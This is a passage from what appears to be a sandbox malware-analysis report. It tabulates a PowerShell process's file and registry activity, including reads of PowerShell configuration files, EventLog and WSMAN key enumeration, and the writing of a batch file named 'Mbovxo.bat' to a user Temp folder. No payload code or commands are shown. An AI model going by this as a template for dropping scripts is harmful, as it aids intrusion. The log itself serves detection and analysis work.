| Create | C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\Mbovxo.bat | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Get Info | C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.config | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0 | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Users\aDU0VK IWA5kLS | type = file_attributes |
|
5 | |
| Get Info | C:\ | type = file_attributes |
|
6 | |
| Get Info | C:\Users\aDU0VK IWA5kLS\Desktop | type = file_attributes |
|
9 | |
| Get Info | C:\Users | type = file_attributes |
|
4 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aDU0VK IWA5kLS\Documents\WindowsPowerShell\profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aDU0VK IWA5kLS\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\Mbovxo.bat | type = file_attributes |
|
2 | |
| Get Info | C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\Mbovxo.bat | type = file_type |
|
2 | |
| Get Info | C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\Mbovxo.bat | type = file_attributes |
|
3 | |
| Open | STD_INPUT_HANDLE |
|
1 | ||
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 4096, size_out = 4096 |
|
3 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 4096, size_out = 3315 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 781, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | size = 4096, size_out = 4096 |
|
41 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | size = 4096, size_out = 436 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 4096, size_out = 4096 |
|
6 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 4096, size_out = 2530 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 542, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 4096 |
|
5 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 4018 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 78, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 4096, size_out = 4096 |
|
6 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 4096, size_out = 2762 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 310, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | size = 4096, size_out = 4096 |
|
17 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | size = 4096, size_out = 3022 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | size = 50, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | size = 4096, size_out = 4096 |
|
6 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | size = 4096, size_out = 281 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | size = 4096, size_out = 4096 |
|
62 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | size = 4096, size_out = 3895 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | size = 201, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | size = 4096, size_out = 4096 |
|
21 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | size = 4096, size_out = 3687 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | size = 409, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | size = 4096, size_out = 4096 |
|
4 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | size = 4096, size_out = 2228 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | size = 844, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | size = 4096, size_out = 4096 |
|
4 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | size = 4096, size_out = 3736 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | size = 360, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Write | C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\Mbovxo.bat | size = 332 |
|
1 |
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | ||
| Open Key | HKEY_CURRENT_USER\Environment |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
2 | ||
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
9 | ||
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell |
|
4 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell |
|
4 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell |
|
4 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell |
|
4 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell |
|
4 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell |
|
4 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security |
|
4 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell |
|
4 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
2 | ||
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds |
|
1 | ||
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Environment | value_name = PSMODULEPATH, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | value_name = path, data = 0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | value_name = path, data = 0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
9 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
9 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds | value_name = PipelineMaxStackSizeMB, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds | value_name = PipelineMaxStackSizeMB, type = REG_NONE |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | ||
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | ||
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | ||
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | ||
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | ||
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | ||
